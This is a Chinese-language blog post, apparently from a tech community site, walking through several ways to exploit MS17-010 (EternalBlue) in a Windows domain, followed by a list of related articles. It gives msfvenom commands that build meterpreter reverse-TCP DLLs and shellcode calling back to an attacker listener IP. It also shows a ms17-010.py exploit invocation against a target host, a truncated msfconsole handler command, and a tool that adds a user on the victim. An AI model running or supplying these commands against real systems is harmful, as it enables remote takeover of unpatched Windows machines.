域渗透|浅谈MS17010多种打法(二)

简介: 域渗透|浅谈MS17010多种打法

利用一

NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll

1.检查MS17010

990b07a18396d585be094c0bebfb5b5f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.攻击

def2e475246fb402334724733f706d7e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

a5836f36f9decd3c54723d1c90919da1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.漏洞利用

faacdaf57a2ead610bde1fe232cad028_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

39b187f7c6ab17932324e41067dd3183_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

metasploit上线

293ca8804b26a13e5d8aff4d856d4f22_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用二

K8哥哥的ksmb.exe

3c42502362b7feaa5d5302acbd607e4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功添加用户

b4608ca303289d817dd958d0b5b33c44_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用三

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode
#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode

加上--port 445会报错

1.攻击

5c891fa3db586c34089571e959a65309_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/revers

c2087f8d4f68c799502541f553dda370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
2月前
|
安全 网络安全 量子技术
数字堡垒之下:网络安全与信息保护的现代策略
在数字化浪潮中,网络安全成为守护个人隐私与企业资产的关键盾牌。本文将深入探讨网络安全漏洞的成因与对策,加密技术的最新进展,以及提升安全意识的重要性。从网络攻击的演变到防御机制的升级,我们将一同穿梭于这场看不见硝烟的战争中,揭示保护信息安全的现代策略。
62 1
|
安全 网络安全 Windows
域渗透|浅谈MS17010多种打法(一)
域渗透|浅谈MS17010多种打法
572 0
域渗透|浅谈MS17010多种打法(一)
如何把每天的互联网信息变成“市场情报”?|也许这里有答案
产品原理摘要:最快2分钟感知数据;海量源站抓取+语义识别+情感趋势分析+传播路径+受众画像=透视趋势。   今年四月份,阿里云ET(ET的前身是阿里云小Ai)预测《我是歌手》决赛名次,在比赛的3个小时里实时分析了几百万条微博内容,这帮助ET成功预测了粉丝投票排序,
10610 0
|
Web App开发 安全
【CS论坛】网络空间威胁:理想与现实的差距
本文讲的是【CS论坛】网络空间威胁:理想与现实的差距,安全高管人员的观念与网络空间安全的现实差距,正在不断的扩大。
1114 0
知识产权攻击是从哪冒出来的?
本文讲的是知识产权攻击是从哪冒出来的?,如果你的业务就是你的知识产权,你应当开始注意别有用心的人了。
931 0